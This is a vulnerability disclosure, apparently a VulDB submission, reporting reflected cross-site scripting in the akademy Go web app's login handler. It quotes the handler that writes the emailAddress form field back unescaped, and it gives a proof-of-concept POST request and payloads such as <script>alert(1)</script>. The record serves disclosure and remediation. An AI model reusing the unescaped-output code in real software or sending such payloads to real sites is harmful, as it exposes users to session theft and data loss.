Submit #397340: alwindoss akademy None Cross-site Scripting (XSS)

Title: alwindoss akademy None Cross-site Scripting (XSS)
Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in cmd/akademy/handler/handlers.go

Flaw reason: In cmd/akademy/handler/handlers.go, line 40, the code directly outputs the email address provided by the user (obtained from the form values) without any form of filtering or escaping. This can result in Reflected XSS attacks. When a malicious user enters an email address containing a malicious script, the script will be executed in the user's browser, allowing the attacker to perform various malicious actions, such as stealing user information, manipulating user sessions, and more.

Vulnerability POC: Suppose a malicious user enters an email address with a <script> tag, such as <script>alert('XSS'); </script>. When other users visit this page, their browsers execute this JavaScript code, and a warning box pops up saying "XSS", thus proving that there is a vulnerability.

cmd/akademy/handler/handlers.go:

```Go
// HandleLogin implements PageHandler.
func (h pageHandler) HandleLogin(w http.ResponseWriter, r *http.Request) {
	fmt.Println("Handle Login")
	r.ParseForm()
	email := r.FormValue("emailAddress")
	fmt.Println("Email", email)
	// The form value is written to the response without escaping.
	w.Write([]byte(email))
}
```

POC:

```
POST /login HTTP/1.1
Host: 192.168.1.7:8080
Content-Length: 148
Cache-Control: max-age=0
Origin: http://192.168.1.7:8080
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.7:8080/login
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zh-TW;q=0.5
Cookie: csrf_token=4JyyOAwRuo9QF%2Bo71swuLmUwAEq15hh7AX/+Flas=
Connection: keep-alive

csrf_token=Iw9pXtxC5SGAwRuo9QF%2Bo71swuLmUwADk9tnAwRuo9QF%2Bo71swuLmUwAXbf0JbiLxPFkrjqc%2BA%3D%3D&emailAddress=<script>alert(1)</script>
```

![image](https://github.com/user-attachments/assets/0b983660-1b03-4de4-b6df-94b35b7493da)

![image](https://github.com/user-attachments/assets/94f553fb-0320-4bc7-a4a3-6175a6e9a6e2)
Source: https://github.com/alwindoss/akademy/issues/1
User: zihe (UID 56943)
Submission: 08/24/2024 10:42 (2 years ago)
Moderation: 09/04/2024 08:58 (11 days later)
Status: Accepted
VulDB entry: 276487 [alwindoss akademy up to 35caccea888ed63d5489e211c99edff1f62efdba handlers.go emailAddress cross site scripting]
Points: 20
